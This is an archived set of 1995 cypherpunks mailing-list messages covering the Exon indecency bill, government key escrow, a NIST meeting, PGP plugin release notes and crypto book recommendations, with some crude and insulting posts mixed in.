margin he had for the Wyden amendment?  Tune in for the exciting 
fireworks next week or so for House action....  yeah, right!

    and as a last resort, Clinto has vowed to veto the bill for two 
reasons: the open season privileges for big business to consolidate all 
telecommonications into a few empires, and the lack of regulation to 
control same.  Maybe now that Hillary is not out front, maybe Bill will 
find his balls, or maybe he will waffle again....

-------

On Wed, 6 Dec 1995, Timothy C. May wrote:

> 
> I just heard (12:15 EST) that the House has adopted language similar to the
> original Exon-Coates language in the Senate (as opposed to the White
> language, which was less restrictive in that it dealt with material that
> was "harmful" to children, interpreted to mean child porn).
> 
> It looks like Internet Service Providers will soon be held liable for
> "indecent material" passed by their systems. I would expect most ISPs will
> drop the alt.binaries.* newsgroups as a first step, and maybe other groups
> as well.
> 
> (Controlling Web page accesses is a much tougher problem, of course. so I
> wouldn't expect much action on this at first.)
> 
> By the way, I recently discovered a new twist on "age credentials": the use
> of credit cards to prove age. One image site is asking for a "valid credit
> card number" to be given...not to use for charges, but just to do a quick
> verification (they claim a few minutes or less) that the card is valid and
> in the name of the person accessing their site.
> 
> Some obvious security issue. An interesting twist, though.
> 
> If the Exon Bill really does go into effect, and age limits on access are
> imposed, I'll be looking for what we've always joked about: the
> "Information Superhighway Driver's License."
> 
> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Burrell <jburrell@crl.com>
Date: Wed, 6 Dec 95 20:51:12 PST
To: Bill Humphries <Bill.Humphries@msn.fullfeed.com>
Subject: Re: Responding to Exon -- technology is not enough
In-Reply-To: <v01530501acebcc1c5522@[199.184.183.25]>
Message-ID: <Pine.SUN.3.91.951206203135.13303C-100000@crl8.crl.com>
MIME-Version: 1.0
Content-Type: text/plain


[This document was Exonized at The Exon-Hyde Center for Thought Cleansing.]

On Wed, 6 Dec 1995, Bill Humphries wrote:

> Fine for the tiny subset of Net users who understand crypto enough to use
> it on a daily basis. I'm not one of people either. This crypto isn't user
> friendly stuff. Before you propose such as solution, better make sure
> people can use this stuff.

You're right here, definately. While I'm not volunteering, I think
something could be written, such as an encrypted UUCP transfer system, and
a better premail. 

PGP is reasonably user friendly, if you have any kind of memory at all. It
isn't, of course, user friendly if you have to save your message to a
file, shell, encrypt it, exit the shell, load it back in, and send it. I
think that there is the major problem with PGP. I *know* that kind of
thing is a problem with chaining anon mailers, unless you have installed
an application such as Premail. 

I think that we'll eventually see applications such as Eudora pop up with 
PGP support, directly or indirectly.

> >Anyone wish to comment on the prospect of a double blind server, set
> >outside U.S. borders, that can act as an interface to the rest of the
> >world, perhaps encrypting or stego'ing the data transfered between it and
> >the user? Basically, an anonymous remailer that acts as a cross between
> >an NNTP, POP3, and SMTP servers.
> 
> How are you going to pitch this technology to all the people with AOL and
> Microsoft Network accounts who barely understand the net? These are the
> people who need exposure to all the uncensored expression they can get.

I was thinking more along the lines of an offline message packet that the
server creates, encrypts, chains through anon mailers with an response
block, and sends to you. You get it, run it through a filter, run your
offline reader, such as Yarn, write your replies, run another program to
get an encrypted, reply-blocked, ready to send packet, and drop it right
into the SMTP port. I don't know if the AOL and MSN software would even
allow this without difficulty, as I haven't seen it. 

I just used it as an example, though. I'm sure there are much better ideas
out there. 

> Instead of figuring out how to build a new treehouse that excludes Exon and
> Hyde, how about fighting the damned bill in the courts?

Here's a chain of events:

1) Congress gets their wish, and it all passes.
2) President signs into law.
3) ISPs:
   a) Shutdown, which isn't really likely,
   b) Severely restrict service, or
   c) Tell the government where to shove it (and watch themselves 
      promptly prosecuted). After one or two ISPs are busted, the rest
      will "fall in line."
4) Someone gets caught writing "<EXON>" in E-MAIL or on USENET, or 
   committing some other form of thought-crime, and is prosecuted.
5) While this person is fighting his or her impending exonization and 
   cleansing of dirty thoughts, the rest of us have our free speech 
   severely restricted. Would I be wrong in saying that it would take a 
   long time, and a lot of money to fight this up to the Supreme Court?

Then we risk the Supreme Court ruling in favor of Congress, however
unlikely that may seem. The S.C. could just as easily tell us to "exon 
off" to keep the world safe for mentally impaired children that, while 
smart enough to operate a computer and go looking for pornography, are 
damaged by it and/or the word "exon."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 6 Dec 95 21:36:55 PST
To: m5@dev.tivoli.com (Mike McNally)
Subject: Re: Solution for US/Foreign Software?
Message-ID: <m0tNYMq-0008zoC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:28 PM 12/6/95 -0600, you wrote:
>
>Bill Stewart writes:
> > I had interpreted the suggestion differently - rather than a system with 
> > user-accessible crypto hooks, the manufacturer could ship a binary patch
> > upgrade for US customers to install.  The internal design would presumably
> > have crypto hooks (i.e. subroutine calls); they can't ban that.
>
>No, they can't *ban* it, but there's no reason to suspect that they
>won't revoke the export license after the scheme becomes clear.  And
>of course the patch itself would not be exportable.  If there's a
>"wink wink nudge nudge" implication that the patch would make its way
>overseas, I don't understand why that's really any more likely than
>the US-only version getting out.

It isn't that it's "more" likely.  It's probably JUST AS likely.  But
remember, the goal is to allow the US company to actually MAKE MONEY, not to
bootleg its products.  The system I've described would be intended to allow
a manufacturer to continue to sell its exportable product legally.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mary Rose <m.landicho@biology.bbk.ac.uk>
Date: Wed, 6 Dec 95 14:06:42 PST
To: owner-cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <ECS9512062222A@ccs.bbk.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


unsuscribe






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an116512@anon.penet.fi
Date: Wed, 6 Dec 95 14:50:17 PST
To: cypherpunks@toad.com
Subject: Re: latest librand source now av
Message-ID: <9512062243.AA04215@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


In .cypherpunks, Matt Blaze <mab@research.att.com> writes:
>[Sorry if this is a duplicate; my machine had a bogus sendmail.cf
>when I first sent this.]
>
>Souce code for the latest version of librand (a random
>number package based on event interval variations) for
>Unix-like machines is now available in:
>  ftp://ftp.research.att.com/dist/mab/librand.shar
>
>There are no restictions on use or distribution of this
>code, which was written by Matt Blaze, Jack Lacy, and
>Don Mitchell.
>
>-matt
>

why the FUCK would anyone want to use random number code from at&t,
(and mister nescape GAK apologist himself)? this the code that was
broken by french student for christs sakes.

and tell us the truth about the restrictions, next time, bozo.

asshole.

cypherpunks write code themselvess!!!
--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Wed, 6 Dec 95 19:55:13 PST
To: cypherpunks@toad.com
Subject: Re: NIST GAK export meeting, short version
Message-ID: <82563.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  Bill Stewart <stewarts@ix.netcom.com>  writes:
> Maybe this is just an artifact of Pat's wording, but this sounds
> like there may be classified court orders other than FISA?

You are reading more into my writing than I intended. I know
of no other classified court than FISA.

But A. Michael Froomkin noted that my best friend Geoff's slide
said "(e.g. FISA)" and asked, since you used "e.g." what are the
others? Geoff mumbled and rambled. I took it as a no comment.
There were a bunce of lawyers there, including Sobel from EPIC,
Danny W from CDT, etc. Perhaps they know of more than I do,
I'm just a techie.

>> Plus, since you have to be a US citizen to get a clearence,
>>   how can there be approved foreign escrow agents?
> By deals with the foreign governments, presumably reciprocal.

Deals are, of course, possible. But right now, a clearence means
US Citizen. AFAIK, the only legal discrimination allowed in employement
ads is "US Citizenship required" which is code for "clearence required"

>>And the usual, why in hell would a competent spy use
>>  crypto escrowed in the US?
> Competent spies appear to be a surprisingly small fraction of
> even government-employed espionage personnel

OK, I'll grant you that there arn't many of them. Still, why
you don't address my question: why use it if you have an IQ above
air temperature? You traffic and low visibility ideas have merit,
but why open up to FISA?

> And sometimes you're just stuck on the Beltway and have to use your
> car phone to say you'll be a bit late dropping off the secret plans.
You left out the :-)
Actually, you'd have appreciated the November DC-cypherpunks meeting, we
spent a couple hours driving arround, mapping spook facilities.

Pat

Pat Farrell    Grad Student      http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage               #include <standard.disclaimer>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 6 Dec 95 14:30:30 PST
To: cypherpunks@toad.com
Subject: Civilizing Cyberspace (book note)
Message-ID: <199512062231.XAA27734@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Forward:

Steven E. Miller, a member of the national board of
directors of Computer Professionals for Social
Responsibility, has published a new book, *Civilizing
Cyberspace: Policy, Power and the Information
Superhighway* (Addison Wesley, 1995, 413 pages).

This is the best book I have seen on the public policy
debates surrounding the information superhighway. It
covers all aspects of this debate, including democracy,
citizenship, community networks, privacy, intellectual
property, competing models of the NII, universal service,
equity, freedom of expression, protecting the public
interest, encryption, and so on.

Highly recommended for anyone interested in this subject,
or for use as a text in classes.


Gary Chapman, Coordinator, The 21st Century Project
LBJ School of Public Affairs, University of Texas, Austin







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Wed, 6 Dec 95 23:47:12 PST
To: <cypherpunks@toad.com>
Subject: Persona PCMCIA URL?
Message-ID: <v03003f0aacec4bdd3ac9@[129.46.82.94]>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone have a URL for data sheets on the Persona cards?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 6 Dec 95 21:21:14 PST
To: anonymous-remailer@shell.portal.com
Subject: Re: [FYI] FBI Training Eastern European Police
In-Reply-To: <199512070422.UAA22589@jobe.shell.portal.com>
Message-ID: <199512070516.AAA02188@nrk.com>
MIME-Version: 1.0
Content-Type: text/plain


> >   FBI School Teaches New Tricks to Old Enemies

I've heard stories that several of these programs had unexpected
problems. To wit -- some of the students were showing up from the third
world with severe medical problems; expensive ones, including the
obvious -- AIDS.

Result -- Lots of flack back & forth from field to TPTB.


-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Wed, 6 Dec 95 21:22:11 PST
To: cypherpunks@toad.com
Subject: secure listservs?
Message-ID: <m0tNYlk-001Bo4C@passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Looking for some secure listserv software, preferably something
that will automatically generate purpose-specific PGP keys for
each user and one for the listserv.  Each user encodes mail for
the list with the list's public key, signing it with their own
private key (either the purpose specific one, or their regular
key).  Each user receives mail from the listserv encoded with
the corresponding public key.  That way each user has a choice
of using their published key (for convenience) or their purpose-
specific key, possibly in conjunction with an anonymous remailer,
to ensure the segmentation of these communications from others
that they may engage in.

Anyone seen/built anything like this ?
-- 
Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
mailto:craig@hubley.com     416-778-6136    416-778-1965 FAX
Seventy Eaton Avenue, Toronto, Ontario, Canada M4J 2Z5



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: KLEMEN RAMOVES <KLEMEN@lj-oz.sik.si>
Date: Wed, 6 Dec 95 16:14:53 PST
To: cypherpunks@toad.com
Subject: unsuscribe
Message-ID: <01HYIAGKS0OI0006XT@arnes.si>
MIME-Version: 1.0
Content-Type: text/plain


plz..unsuscribe me..
klemen@lj

klemen@Lj
-oz.sik.si

						KleMeN




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Siberia" <klong@phoenix.net>
Date: Thu, 7 Dec 95 05:26:14 PST
To: cypherpunks@toad.com
Subject: (Fwd) General release of Open Encryptor interface for PGP
Message-ID: <199512071327.HAA06167@phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain


------- Forwarded Message Follows -------
Priority:      normal
Date:          Fri, 8 Dec 1995 00:08:30 +1200
Reply-to:      Pegasus Mail Announcments <PM-NEWS@UA1VM.UA.EDU>
From:          John Navas <JNavas@aimnet.com>
Organization:  The Navas Group, Dublin, CA, USA
Subject:       General release of Open Encryptor interface for PGP
To:            Multiple recipients of list PM-NEWS <PM-NEWS@UA1VM.UA.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

Release 1.0 of my Open Encryptor interface for PGP has been posted on
my anonymous FTP server <ftp://ftp.aimnet.com/users/jnavas/winpmail/>

PGP information is available at http://www.mantis.co.uk/pgp/pgp.html
The MIT distribution of PGP is at ftp://net-dist.mit.edu:/pub/PGP/
ViaCrypt (commercial version of PGP) is at http://www.viacrypt.com/
The International PGP Home Page is at http://www.ifi.uio.no/~staalesc/PGP/

Release notes for PGP Open Encryptor Interface version 1.0:

1.  Only public key cryptography is supported in this release, NOT
    conventional cryptography.
2.  Basic Key Management functions are implemented:
    a.  To add a public key block contained in a message to your Key
        Ring, either Open or select the message before invoking Key
        Management.  (If a public key block is placed in a digitally
        signed and/or encrypted message, it will not be recognized
        automatically by this interface.)  You can also invoke Key
        Management and paste a public key block into the dialog from
        the Windows Clipboard (which does of course work with a
        signed and/or encrypted message).
    b.  You can check to see if a given email address is on your Key
        Ring -- just paste the email address (without the name) into
        the dialog box control.
    No other Key Management functions are implemented at this time.
3.  Both digital signing and signature verification are implemented:
    a.  If a secret pass phrase is needed (and not provided in
        the PGPPASS environment variable), it MUST be provided each
        time in the WinPMail Password field.
    b.  Please note that signature verification is a strictly *manual*
        process -- you must expliticly use the WinPMail menu.  This is
        a characteristic of WinPMail, NOT this interface.
4.  When encrypting:
    a.  The recipient email address (e.g., jnavas@navasgrp.com) will
        normally select the appropriate public key automatically, but
        it may be overridden with an entry in the WinPMail Password
        field.
    b.  Your recipient may need to add also-known-as entries to
        his/her public key to ensure that you match on various forms
        of email addresses (e.g., also known as
        jnavas@mailhost.aimnet.com).
    c.  The WinPMail Password will NOT be used for encryption of a
        digitally signed message, since the Password is then reserved
        for the secret pass phrase (whether one is needed or not).
5.  If encryption or signing fails (e.g., because the recipient is not
    on your key ring, or because your secret pass phrase was
    incorrect), an empty message will be sent.  This is a
    characteristic of WinPMail, NOT this interface.
6.  Copies to self of encrypted and/or signed messages are NOT
    encrypted and/or signed.  This is a characteristic of WinPMail, NOT
    this interface.  (If you want an encrypted and/or signed copy, BCC
    yourself.)
7.  It is normally NOT possible for you to decrypt message that you
    have encrypted for someone else (since you do not have that
    person's secret key).  However, you can establish a master
    decryption key by setting the PGPJNKEY environment variable to a
    string needed to select the appropriate public key (yours or not).
    TEST FOR PROPER OPERATION (BY DECRYPTING A MESSAGE ENCRYPTED FOR
    SOMEONE ELSE) BEFORE YOU DEPEND ON IT!  It may be a good idea to
    add an also-known-as alias just for this purpose.
8.  The Cancel button does not work on the Decryption dialog box.
    This is a characteristic of WinPMail, NOT this interface.
9.  When you do a Find on a folder, WinPMail puts up the Decryption key
    dialog for every encrypted message, even when you are only
    searching headers, which can make the process painful.  This is a
    characteristic of WinPMail, NOT this interface.
10. Attachments to encrypted messages are NOT supported.  (Outgoing
    attachments to encrypted messages are NOT encrypted, and incoming
    binary attachments are corrupted.)  This is a characteristic of
    WinPMail, NOT this interface.
11. Windows 3.10, Windows for Workgroups 3.11, and Windows 95 are
    supported.  Windows NT and OS/2 have NOT been tested and are NOT
    currently supported.  USE THEM AT YOUR OWN RISK.
12. MIT PGP 2.6.2 is supported in this release.  Other versions of PGP
    have NOT been tested and are NOT currently supported.  ViaCrypt PGP
    has NOT been tested for this release, but is expected to be
    supported in a subsequent release.  USE THEM AT YOUR OWN RISK.
13. Reassembly and decryption of multiple-part PGP messages is NOT
    supported.
14. PGP messages sent by other WinPMail Open Encryptor PGP interfaces
    may not trigger this interface.  (Other PGP sources should not be a
    problem.)  This is a characteristic of WinPMail, NOT this
    interface.

To install the PGP Open Encryptor Interface:

1.  UnZIP in a subdirectory of FORMS called PGPJN
    (e.g., \PMAIL\FORMS\PGPJN).
2.  Copy the PGPJNP.FFF file up to your WinPMail directory (e.g.,
    \PMAIL).
3.  Make sure that PGP is installed correctly, and that the PGPPATH
    environment variable is set correctly.  (If PGPPATH is set, PGP
    does not need to be in your PATH.)
4.  Encrypt and send a message to yourself to test operation.

John Navas <JNavas@NavasGrp.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMbC7O5ya4p8vxAtAQHO7wH/atOJoEbrUX2G/Zzr3jZCvblQZXBWzlv6
KTNraPxaui8jtw83U+pZYWV/jNVJ48Fw4Fy6XeQrtdzXJsi0tKJZtg==
=jZvU
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Thu, 7 Dec 95 05:33:57 PST
To: cypherpunks@toad.com
Subject: (Fwd) General release of Open Encryptor interface for PGP
Message-ID: <309290F7177@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


	I believe this may be of intrest to those on this list.
	Pegasus is available at 
<ftp://risc.ua.edu/pub/network/pegasus/winpm223.zip>

	Enjoy.

------- Forwarded Message Follows -------
Priority:      normal
Date:          Fri, 8 Dec 1995 00:08:30 +1200
Reply-to:      Pegasus Mail Announcments <PM-NEWS@UA1VM.UA.EDU>
From:          John Navas <JNavas@aimnet.com>
Organization:  The Navas Group, Dublin, CA, USA
Subject:       General release of Open Encryptor interface for PGP
To:            Multiple recipients of list PM-NEWS <PM-NEWS@UA1VM.UA.EDU>

-----BEGIN PGP SIGNED MESSAGE-----

Release 1.0 of my Open Encryptor interface for PGP has been posted on
my anonymous FTP server <ftp://ftp.aimnet.com/users/jnavas/winpmail/>

PGP information is available at http://www.mantis.co.uk/pgp/pgp.html
The MIT distribution of PGP is at ftp://net-dist.mit.edu:/pub/PGP/
ViaCrypt (commercial version of PGP) is at http://www.viacrypt.com/
The International PGP Home Page is at http://www.ifi.uio.no/~staalesc/PGP/

Release notes for PGP Open Encryptor Interface version 1.0:

1.  Only public key cryptography is supported in this release, NOT
    conventional cryptography.
2.  Basic Key Management functions are implemented:
    a.  To add a public key block contained in a message to your Key
        Ring, either Open or select the message before invoking Key
        Management.  (If a public key block is placed in a digitally
        signed and/or encrypted message, it will not be recognized
        automatically by this interface.)  You can also invoke Key
        Management and paste a public key block into the dialog from
        the Windows Clipboard (which does of course work with a
        signed and/or encrypted message).
    b.  You can check to see if a given email address is on your Key
        Ring -- just paste the email address (without the name) into
        the dialog box control.
    No other Key Management functions are implemented at this time.
3.  Both digital signing and signature verification are implemented:
    a.  If a secret pass phrase is needed (and not provided in
        the PGPPASS environment variable), it MUST be provided each
        time in the WinPMail Password field.
    b.  Please note that signature verification is a strictly *manual*
        process -- you must expliticly use the WinPMail menu.  This is
        a characteristic of WinPMail, NOT this interface.
4.  When encrypting:
    a.  The recipient email address (e.g., jnavas@navasgrp.com) will
        normally select the appropriate public key automatically, but
        it may be overridden with an entry in the WinPMail Password
        field.
    b.  Your recipient may need to add also-known-as entries to
        his/her public key to ensure that you match on various forms
        of email addresses (e.g., also known as
        jnavas@mailhost.aimnet.com).
    c.  The WinPMail Password will NOT be used for encryption of a
        digitally signed message, since the Password is then reserved
        for the secret pass phrase (whether one is needed or not).
5.  If encryption or signing fails (e.g., because the recipient is not
    on your key ring, or because your secret pass phrase was
    incorrect), an empty message will be sent.  This is a
    characteristic of WinPMail, NOT this interface.
6.  Copies to self of encrypted and/or signed messages are NOT
    encrypted and/or signed.  This is a characteristic of WinPMail, NOT
    this interface.  (If you want an encrypted and/or signed copy, BCC
    yourself.)
7.  It is normally NOT possible for you to decrypt message that you
    have encrypted for someone else (since you do not have that
    person's secret key).  However, you can establish a master
    decryption key by setting the PGPJNKEY environment variable to a
    string needed to select the appropriate public key (yours or not).
    TEST FOR PROPER OPERATION (BY DECRYPTING A MESSAGE ENCRYPTED FOR
    SOMEONE ELSE) BEFORE YOU DEPEND ON IT!  It may be a good idea to
    add an also-known-as alias just for this purpose.
8.  The Cancel button does not work on the Decryption dialog box.
    This is a characteristic of WinPMail, NOT this interface.
9.  When you do a Find on a folder, WinPMail puts up the Decryption key
    dialog for every encrypted message, even when you are only
    searching headers, which can make the process painful.  This is a
    characteristic of WinPMail, NOT this interface.
10. Attachments to encrypted messages are NOT supported.  (Outgoing
    attachments to encrypted messages are NOT encrypted, and incoming
    binary attachments are corrupted.)  This is a characteristic of
    WinPMail, NOT this interface.
11. Windows 3.10, Windows for Workgroups 3.11, and Windows 95 are
    supported.  Windows NT and OS/2 have NOT been tested and are NOT
    currently supported.  USE THEM AT YOUR OWN RISK.
12. MIT PGP 2.6.2 is supported in this release.  Other versions of PGP
    have NOT been tested and are NOT currently supported.  ViaCrypt PGP
    has NOT been tested for this release, but is expected to be
    supported in a subsequent release.  USE THEM AT YOUR OWN RISK.
13. Reassembly and decryption of multiple-part PGP messages is NOT
    supported.
14. PGP messages sent by other WinPMail Open Encryptor PGP interfaces
    may not trigger this interface.  (Other PGP sources should not be a
    problem.)  This is a characteristic of WinPMail, NOT this
    interface.

To install the PGP Open Encryptor Interface:

1.  UnZIP in a subdirectory of FORMS called PGPJN
    (e.g., \PMAIL\FORMS\PGPJN).
2.  Copy the PGPJNP.FFF file up to your WinPMail directory (e.g.,
    \PMAIL).
3.  Make sure that PGP is installed correctly, and that the PGPPATH
    environment variable is set correctly.  (If PGPPATH is set, PGP
    does not need to be in your PATH.)
4.  Encrypt and send a message to yourself to test operation.

John Navas <JNavas@NavasGrp.com>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMMbC7O5ya4p8vxAtAQHO7wH/atOJoEbrUX2G/Zzr3jZCvblQZXBWzlv6
KTNraPxaui8jtw83U+pZYWV/jNVJ48Fw4Fy6XeQrtdzXJsi0tKJZtg==
=jZvU
-----END PGP SIGNATURE-----
-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
Expertise in one field does not carry over into other fields.  But
experts often think so.  The narrower their field of knowledge the
more likely they are to think so.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pfarrell@netcom.com (Pat Farrell)
Date: Thu, 7 Dec 95 07:55:22 PST
To: pfarrell@netcom.com
Subject: NIST GAK, Escrow Agent Criteria available
Message-ID: <199512071554.HAA11631@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At the meeting, the NIST/NSA folks presented their criteria for
being an acceptable escrow agent criteria. They had hardcopy, and
Geoff had slides. The slides didn't exactly match the hardcopy.

I have typed in the text from my hardcopy. It is on my clipper2
page (which is under construction at
<a href="http:/www.isse.gmu.edu/~pfarrell/nist/clipper2.html">)
url for the criteria for escrow agent entities is
<a href="http:/www.isse.gmu.edu/~pfarrell/nist/escagent.html">

I will _not_ post it (about 4 pages) to the list.
If you can't use the web, email me and I'll forward a copy.

I've got some notes on Geoff's presentation that I'll post later on.

Pat

Pat Farrell      grad student        http://www.isse.gmu.edu/students/pfarrell
Infor. Systems and Software Engineering, George Mason University, Fairfax, VA
PGP key available via finger or request           #include standard.disclaimer




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 8 Dec 95 08:30:07 PST
To: Nicholas Philp <cypherpunks@toad.com
Subject: Re: (no subject)
Message-ID: <199512081631.IAA15841@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 05:25 PM 12/8/95, Nicholas Philp wrote:
>WE WANT SOME PUSSY PICTURES


Sorry:  You only get them if Netscape continues to play coy
on GAK

 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Fri, 8 Dec 95 08:30:21 PST
To: Jeff Weinstein <cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199512081631.IAA15969@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:14 AM 12/6/95 -0800, Jeff Weinstein wrote:
>  Our representative at the NIST meeting said 
> [GAK violates the rights of netscape's customers]
> It should be up on the web site in a few days when he gets
> back from DC.

Still not there.

When do you think it will come up.


 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Thu, 7 Dec 95 05:36:58 PST
To: SBinkley@atitech.ca
Subject: Re: GAK
Message-ID: <9512071337.AA02622@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Scott Binkley writes:
>I heard a while back about being able to "split" up a PGP key.  What 
>about
>splitting up the key into many parts, and giving them out to multiple 
>INDEPENDANT
>agencies.  ie: One piece goes to the FBI, one to the NSA, one to some 
>other committee, and
>so on.  That way, no goverment body could just tap your conversations 
>without getting
>approval from others, and gaining the pieces of your key.
>
>just a thought

Why give them your key in the first place?  Personally, I wouldnt trust any 
government agency with even a fraction of my key - what makes you think they 
arent *allready* working together?  Then you have effectively given your key, 
and all of your private mail, to the government, no restrictions.
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Daniel Miskell <DMiskell@envirolink.org>
Date: Thu, 7 Dec 95 05:47:33 PST
To: Bill.Humphries@msn.fullfeed.com
Subject: Re: Responding to Exon -- technology is not enough
Message-ID: <9512071348.AA02951@envirolink.org>
MIME-Version: 1.0
Content-Type: text/plain


Bill Humphries writes:
>Instead of figuring out how to build a new treehouse that excludes Exon and
>Hyde, how about fighting the damned bill in the courts?

Possibly because a) it is allready being faught, and b) court battles cost 
money which most folks dont have.  If people are unfamilliar with 
encryptation, they should do a web search and find out what they can, then use 
it.  What you are saying (as far as encryptation not being an answer because 
so few know how to use it) feels like "lets not use a gun to defend our home 
from intrusion because so few know how to handle them.  You dont just assume 
that bewcause you dont know how that you give up.  You learn how.  That is how 
i found this list - because i did a little running around.

Munster
---
_________________________________
*!Cheese Doctrine:!*
    Though cultured over time,
and aged to perfection, one must
not yield to produce mold.  One
must also not belittle themselves
by conforming to the "whiz", but
melt over the unprocessed ideas
of Ghuda.
_________________________________






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 7 Dec 95 06:39:26 PST
To: REES@rmcs.cranfield.ac.uk
Subject: Plea for information
Message-ID: <199512071423.JAA14918@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Daniel,

   During a year in this penitentiary, here's five I heard the
   older cons mutter:

   1. "Applied Cryptography," Second edition just out, Bruce
   Schneier, Wiley, 1996. Flip through it and stare in
   disbelief and awe. Enjoy 2-5 and return, anxious.

   2. "The Codebreakers," David Kahn, Macmillan, 1967. Crypto-
   biblical tales of lying and cheating via momentarily secret
   tricks. Continued in 3.

   3. "Cyphernomicon," Tim May et al, 1006-Far Future. A wad
   of inspiring sci-non-fi of miscreating, eluding hard-bars
   and regaling in off-shore soft-bars. Also, C4.

   4. "Cypherpunks archives," All Wholesomes, <www.hks.net>,
   Infinite. The stingers honey pot for luring beekeepers into
   berzerk swarms. Wear 5 for protection.

   5. "PGP." Download it somewhere somewhat legally while you
   can, practice picking this sitar. And heave some brick-
   bucks at benefactor Phil for malefactor dues.














From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Thu, 7 Dec 95 06:46:55 PST
To: Bill.Humphries@msn.fullfeed.com (Bill Humphries)
Subject: Re: Responding to Exon -- technology is not enough
In-Reply-To: <v01530501acebcc1c5522@[199.184.183.25]>
Message-ID: <9512071447.AA04735@outland>
MIME-Version: 1.0
Content-Type: application/pgp

PGP message


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Adam Hupp" <ahupp@primenet.com>
Date: Thu, 7 Dec 95 19:46:34 PST
To: cypherpunks@toad.com
Subject: Re: PGP
Message-ID: <199512080347.UAA22206@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


           Sorry...I was always taught that the user should not
       be mandated to finish the job of the programmer.  Please,
       do not take me wrong, PGP is a remarkable tool...but I
       was not aware I had iron out the bugs.  That part is the
       easiest to do compared with the genius of the program...
       but I still should not have to do it.

This is not "ironing out bugs".  It is configuring the program to run 
on your version of Unix.  

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6
